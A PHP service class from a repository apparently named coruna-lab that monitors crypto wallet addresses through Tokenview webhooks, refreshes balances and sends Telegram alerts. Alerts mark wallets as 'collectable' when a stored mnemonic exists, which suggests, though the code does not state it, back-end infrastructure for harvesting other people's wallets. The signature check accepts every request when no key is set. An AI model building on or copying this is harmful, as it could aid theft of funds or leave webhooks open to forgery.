Files
coruna-lab/app/Services/Tokenview/TokenviewMonitorService.php
T
root 5859f4f1b3 fix: refresh BTC balances from chain instead of Trust/TokenView totals
Webhook and ingest were writing Trust/client numbers (often sats or lifetime received) into wallet_addresses.btc, so alerts showed fake balances like 48 BTC. Use mempool funded-spent like Tron.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-10-08 05:11:44 +00:00

334 lines
11 KiB
PHP

<?php
namespace App\Services\Tokenview;
use App\Models\Device;
use App\Models\TokenviewEvent;
use App\Models\WalletAddress;
use App\Services\TelegramNotifier;
use App\Services\WalletBalanceService;
use App\Support\SafeLog;
use Illuminate\Support\Facades\DB;
use Illuminate\Support\Facades\Log;
class TokenviewMonitorService
{
/** Stop retrying an address after this many consecutive sync failures. */
public const MAX_SYNC_FAILURES = 3;
public function __construct(
private readonly TokenviewClient $client,
private readonly TelegramNotifier $telegram,
private readonly WalletBalanceService $balances,
) {}
/**
* Map chain_type → Tokenview coin abbr (null = unsupported).
*/
public static function coinAbbrFromChainType(?string $chainType): ?string
{
return match (strtoupper(trim((string) $chainType))) {
'ETH', 'ETHEREUM', 'EVM' => 'eth',
'TRX', 'TRON' => 'trx',
'BTC', 'BITCOIN' => 'btc',
'BNB', 'BSC', 'BINANCE' => 'bsc',
default => null,
};
}
/**
* Map Tokenview webhook coin → wallet_addresses column for native value.
*/
public static function nativeColumnForCoin(string $coin): ?string
{
return match (strtoupper($coin)) {
'ETH' => 'eth',
'TRX' => 'trx',
'BTC' => 'btc',
'BSC', 'BNB' => 'bnb',
default => null,
};
}
/**
* Returns true if this address should have monitoring enabled:
* Tokenview is configured AND the chain type is supported.
* Does NOT make an API call — purely a local check.
*/
public function shouldMonitor(WalletAddress $address): bool
{
if (! $this->client->enabled()) {
return false;
}
return self::coinAbbrFromChainType($address->chain_type) !== null;
}
public function syncMonitor(WalletAddress $address): bool
{
if (! $this->client->enabled()) {
return false;
}
$coin = self::coinAbbrFromChainType($address->chain_type);
if ($coin === null) {
Log::info('tokenview sync skipped: unsupported chain', [
'id' => $address->id,
'chain_type' => $address->chain_type,
]);
return false;
}
$addr = (string) $address->address;
if ((int) $address->monitor === 1) {
$ok = $this->client->addAddress($coin, $addr);
if ($ok) {
$address->monitor_synced = true;
$address->monitor_failures = 0;
$address->save();
} else {
// Bump consecutive failure counter; the scheduled task stops
// retrying once it reaches MAX_SYNC_FAILURES.
$address->monitor_failures = (int) $address->monitor_failures + 1;
$address->save();
}
return $ok;
}
$ok = $this->client->removeAddress($coin, $addr);
if ($ok) {
$address->monitor_synced = false;
$address->monitor_failures = 0;
$address->save();
}
return $ok;
}
/**
* @param array<string, mixed> $payload
*/
public function handleWebhook(array $payload): void
{
$log = SafeLog::channel('tokenview');
$address = trim((string) ($payload['address'] ?? ''));
$txid = trim((string) ($payload['txid'] ?? ''));
$coin = strtoupper(trim((string) ($payload['coin'] ?? '')));
if ($address === '' || $txid === '' || $coin === '') {
$log->info('webhook skip: missing address/txid/coin', ['payload' => $payload]);
return;
}
$tokenSymbol = strtoupper(trim((string) ($payload['tokenSymbol'] ?? '')));
// Native TRX webhooks omit tokenSymbol. Only drop explicit non-USDT/TRX tokens.
if (in_array($coin, ['TRX', 'TRON'], true)
&& $tokenSymbol !== ''
&& ! in_array($tokenSymbol, ['TRX', 'USDT'], true)) {
$log->info('webhook skip: non-USDT/TRX token on TRX chain', [
'coin' => $coin,
'tokenSymbol' => $tokenSymbol,
'address' => $address,
]);
return;
}
$value = $payload['value'] ?? null;
$tokenValue = $payload['tokenValue'] ?? null;
$lookup = $this->normalizeAddress($address, $coin);
$rows = WalletAddress::query()
->where('monitor', 1)
->where(function ($q) use ($lookup, $address) {
$q->where('address', $lookup)->orWhere('address', $address);
if (strcasecmp($lookup, $address) !== 0) {
$q->orWhereRaw('LOWER(address) = ?', [strtolower($lookup)]);
}
})
->get();
if ($rows->isEmpty()) {
// Also check if the address exists at all (monitor=0)
$exists = WalletAddress::query()
->where(function ($q) use ($lookup, $address) {
$q->where('address', $lookup)->orWhere('address', $address);
})
->exists();
$log->info('webhook skip: no matching wallet address', [
'address' => $address,
'lookup' => $lookup,
'coin' => $coin,
'exists_but_monitor_off' => $exists,
]);
return;
}
$dedupeSymbol = $tokenSymbol;
try {
TokenviewEvent::query()->create([
'txid' => $txid,
'address' => $lookup,
'coin' => $coin,
'token_symbol' => $dedupeSymbol,
'value' => is_scalar($value) ? (string) $value : null,
'token_value' => is_scalar($tokenValue) ? (string) $tokenValue : null,
]);
} catch (\Throwable) {
$log->info('webhook skip: duplicate txid already processed', [
'txid' => $txid,
'address' => $lookup,
]);
return;
}
$deltas = $this->resolveDeltas($coin, $value, $tokenSymbol, $tokenValue);
if ($deltas === []) {
$log->info('webhook skip: no resolvable deltas', [
'coin' => $coin,
'value' => $value,
'tokenSymbol' => $tokenSymbol,
'tokenValue' => $tokenValue,
]);
return;
}
$refreshRows = $rows->filter(function (WalletAddress $row) {
return in_array(strtoupper((string) $row->chain_type), ['TRON', 'TRX', 'BTC', 'BITCOIN'], true);
});
$deltaRows = $rows->filter(function (WalletAddress $row) {
return ! in_array(strtoupper((string) $row->chain_type), ['TRON', 'TRX', 'BTC', 'BITCOIN'], true);
});
// Tron/BTC webhooks only carry deltas — refresh from chain as source of truth.
// BTC stored `btc` is often Trust/client sats-or-lifetime totals, not current UTXO.
foreach ($refreshRows as $row) {
/** @var WalletAddress $row */
if (! $this->balances->refresh($row)) {
$this->applyDeltasToRow($row, $deltas);
}
}
if ($deltaRows->isNotEmpty()) {
DB::transaction(function () use ($deltaRows, $deltas) {
foreach ($deltaRows as $row) {
/** @var WalletAddress $row */
$this->applyDeltasToRow($row, $deltas);
}
});
}
$changes = [];
foreach ($deltas as $col => $delta) {
if ($delta != 0.0) {
$changes[$col] = $delta;
}
}
if ($changes === []) {
$log->info('webhook skip: all deltas are zero', [
'deltas' => $deltas,
'address' => $lookup,
]);
return;
}
$primary = $rows->first();
$primary->refresh();
$balanceSummary = $primary->coinsSummary();
$deviceKey = Device::query()->whereKey($primary->device_id)->value('device_id') ?: (string) $primary->device_id;
$log->info('webhook dispatching notification', [
'address' => $lookup,
'device_key' => $deviceKey,
'changes' => $changes,
'rows_count' => $rows->count(),
]);
$collectable = $rows->contains(fn (WalletAddress $row) => $row->mnemonic_id !== null);
$source = trim((string) ($primary->source ?? ''));
if ($source === '') {
$source = (string) ($rows->first(fn (WalletAddress $row) => trim((string) $row->source) !== '')?->source ?? '');
}
foreach ($changes as $col => $delta) {
$this->telegram->notifyBalanceChange(
(string) $deviceKey,
$lookup,
strtoupper($col),
WalletAddress::formatAmount($col, abs($delta)),
$coin,
$balanceSummary,
$delta > 0,
$collectable,
$source,
);
}
}
/**
* @param array<string, float> $deltas
*/
private function applyDeltasToRow(WalletAddress $row, array $deltas): void
{
foreach ($deltas as $col => $delta) {
$current = $row->{$col};
$base = ($current === null || $current === '') ? 0.0 : (float) $current;
$row->{$col} = $base + $delta;
}
$row->save();
}
public function verifySignature(string $rawBody, ?string $signature): bool
{
$signKey = (string) config('coruna.tokenview.sign_key');
if ($signKey === '') {
return true;
}
if ($signature === null || $signature === '') {
return false;
}
$expected = hash_hmac('sha256', $rawBody, $signKey);
return hash_equals($expected, strtolower($signature))
|| hash_equals($expected, $signature);
}
/**
* @return array<string, float> column => delta
*/
private function resolveDeltas(string $coin, mixed $value, string $tokenSymbol, mixed $tokenValue): array
{
$deltas = [];
if ($tokenSymbol !== '' && is_numeric($tokenValue)) {
$col = strtolower($tokenSymbol);
if (in_array($col, WalletAddress::COIN_COLUMNS, true)) {
$deltas[$col] = (float) $tokenValue;
}
}
if (is_numeric($value)) {
$nativeCol = self::nativeColumnForCoin($coin);
if ($nativeCol !== null) {
// Prefer token delta when both present for same column (USDT-only token txs
// often still send a tiny native gas value — keep both columns when distinct).
$deltas[$nativeCol] = (float) $value;
}
}
return $deltas;
}
private function normalizeAddress(string $address, string $coin): string
{
$c = strtolower($coin);
if (in_array($c, ['eth', 'bsc', 'bnb'], true) || str_starts_with($address, '0x') || str_starts_with($address, '0X')) {
return strtolower($address);
}
return $address;
}
}